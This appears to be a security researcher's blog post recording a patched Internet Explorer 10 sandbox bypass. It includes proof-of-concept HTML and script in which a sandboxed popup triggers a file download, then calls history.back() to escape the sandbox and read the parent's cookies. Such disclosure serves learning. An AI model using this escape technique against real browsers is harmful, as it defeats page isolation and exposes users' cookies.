IE10 Sandbox Bypass: Triggering a Download and Going Back Removes Sandbox Flags

I found that a sandboxed window could escape its sandbox by triggering a file download (.zip, .exe, .wmv, etc.) and then calling history.back(). After the back navigation, the page loaded without sandbox restrictions, allowing it to read cookies and access parent DOM. This was a post-patch variation of an earlier sandbox bypass (Win8 #502939).

<!-- index.html: sandboxed iframe that opens a new sandboxed window -->
<iframe sandbox="allow-scripts allow-popups" src="sandboxed.html"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE TOP WINDOW";
</script>

<!-- sandboxbreaker.html: navigated to from inside the popup -->
<a href="wmv.wmv"></a>
<script>
document.links[0].click(); // It triggers the download.
history.back(); // We go back to outofsandbox.html and now it is really out of the Sandbox.
</script>

The sandboxed iframe opened a new popup (outofsandbox.html), which then navigated to sandboxbreaker.html. That page programmatically clicked a link to download a .wmv file, then called history.back(). After going back, the sandbox was no longer enforced, and document.cookie in the returned page exposed cookies set by the parent — cookies that should have been inaccessible under the sandbox.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Sandbox Bypass: Flash getURL with javascript: Target Reaches Sandboxed Window] :: [IE10 EoP: Enumerating New Window Object During Redirect is EXPLOITABLE] >